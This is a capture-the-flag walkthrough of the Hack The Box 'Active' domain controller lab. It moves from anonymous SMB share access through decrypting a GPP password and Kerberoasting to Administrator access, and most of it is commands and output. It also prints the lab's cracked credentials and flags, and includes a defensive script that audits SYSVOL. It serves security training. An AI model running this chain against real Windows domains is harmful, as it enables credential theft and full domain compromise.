Challenge Information
Enumeration & Attack Planning
Network
┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap -sV 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-02 01:12 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 52.94% done; ETC: 01:13 (0:00:14 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-02 05:13:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.45 seconds
┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap 10.10.10.100 -p 5985
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-02 01:22 EDT
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).
PORT STATE SERVICE
5985/tcp closed wsman
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
Seeing that the domain, Kerberos and LDAP ports are open, this looks like a domain controller.
The domain is active.htb.
WinRM is closed.
smb
┌──(root㉿kali)-[~/Desktop/htb]
└─# crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
Trying SMB null access succeeded, and I was even able to get the share list.
Having confirmed READ permission on the share named Replication, I decided to connect to it.
┌──(root㉿kali)-[~/Desktop/htb]
└─# smbclient //10.10.10.100/Replication
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5734868 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
10459647 blocks of size 4096. 5734868 blocks available
smb: \active.htb\> cd ..
smb: \> lcd ./smb/
smb: \> prompt
smb: \> recurse
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
Looking at the folder structure, this appears to be the SYSVOL folder.
The presumed scenario is that the SYSVOL folder was replicated but its permissions were misconfigured, exposing it to all users.
For now I pulled all of the contents down locally.
💡 The SYSVOL folder is a share that exists by default on a Domain Controller and plays an important role in AD: GPOs, logon scripts and the like are distributed through this folder.
Exploit (Initial Access)
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# find -name *.xml
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
Since all of SYSVOL's contents were readable, I searched for XML files in case any GPP existed.
As a result I obtained the (encrypted) GPP password of the SVC_TGS user and decrypted it to recover the password.
The password itself seems to be a reminder that GPP is still very much present in the real world. :)
💡 Although it is disabled in current versions, older versions of Windows introduced the “Group Policy Preferences (GPP)” feature to make centrally automated tasks easy, such as creating scheduled tasks or changing the local administrator password on every machine. Convenient as it is, the credentials needed to perform those tasks are stored AES-256 encrypted in XML files in the SYSVOL folder, and since the key is published on MSDN, anyone who can read those files can decrypt the credentials.
This is exactly why I searched for files with the xml extension above.
gpp-decrypt performs the decryption using the AES-256 key published on MSDN.
Reference: https://rootdse.org/posts/active-directory-basics-3/
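As an added example (not part of the original write-up), a small stdlib-only Python auditor that does what the `find -name *.xml` step above does by hand: it walks a local copy of SYSVOL, picks out the preference files that can carry `cpassword`, and reports each targeted account together with whether the value is real ciphertext (re-padded base64 decoding to a multiple of the AES block size) or an empty value with nothing to recover. The sample XML, the `example.local` accounts and the dummy ciphertext are constructed; decryption itself is left to gpp-decrypt as on the page.

```python
import base64
import os
import xml.etree.ElementTree as ET

# GPP preference files that historically carried cpassword (SYSVOL Preferences\<Area>\).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def find_cpasswords(xml_text, path="<inline>"):
    """One finding per <Properties> element carrying cpassword. GPP stores the
    AES-CBC ciphertext as base64 with '=' padding stripped, so a real value
    re-pads to a non-empty multiple of 16 bytes; cpassword="" means no password."""
    findings, root = [], ET.fromstring(xml_text)
    for item in root:
        props = item.find("Properties")
        if props is None or "cpassword" not in props.attrib:
            continue
        cpw = props.attrib["cpassword"]
        try:
            raw = base64.b64decode(cpw + "=" * (-len(cpw) % 4), validate=True)
            well_formed = len(raw) > 0 and len(raw) % 16 == 0
        except ValueError:
            well_formed = False
        findings.append({
            "file": path, "area": root.tag,  # area: Groups, ScheduledTasks, ...
            "account": (props.get("userName") or props.get("accountName")
                        or props.get("runAs") or item.get("name")),
            "changed": item.get("changed"), "well_formed": well_formed})
    return findings


def scan_sysvol(root_dir):
    """Walk a local SYSVOL copy (e.g. the smbclient mget output) and audit it."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in sorted(set(files) & GPP_FILES):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings.extend(find_cpasswords(fh.read(), path))
    return findings


# Constructed sample modelled on the page's Groups.xml; the ciphertext is
# 64 dummy bytes, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
 <User name="example.local\\svc_backup" changed="2018-07-18 20:46:06">
  <Properties action="U" userName="example.local\\svc_backup" cpassword="%s"/>
 </User>
 <User name="example.local\\nopass"><Properties action="U" cpassword=""/></User>
</Groups>""" % base64.b64encode(bytes(range(64))).decode().rstrip("=")
```

Run `scan_sysvol("./smb")` against the directory the `mget *` above populated to get the same findings for every preference file in the copy.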
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5728424 blocks available
smb: \> cd SVC_TGS\Desktop
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# cat user.txt
ed7a69c488540caa823d0ffeadd0aad4
Obtained the user flag through the SMB Users share.
user flag: ed7a69c488540caa823d0ffeadd0aad4
Post-Exploit
Surveying
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-11-07 19:02:31.084947
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$0ae35f4788b2c93d50f36d9594d7743a$<SNIP>
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# hashcat -a 0 tgt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<SNIP>:Ticketmaster1968
The Kerberoasting attempt succeeded and, luckily, I obtained the Administrator's TGT.
I also cracked it with hashcat and obtained the plaintext password.
Privilege Escalation
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# smbclient -U "Administrator%Ticketmaster1968" //10.10.10.100/Users
Try "help" to get a list of possible commands.
smb: \> cd Administrator\Desktop\
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# cat root.txt
19dce8ccdb0dc1ef84308167dfd88884
Connected to the Users share with the obtained Administrator credentials and got the root flag.
root flag: 19dce8ccdb0dc1ef84308167dfd88884
💡 If you want to run OS commands, you can use techniques such as wmiexec, smbexec, atexec and the like.
impacket and crackmapexec both have this functionality!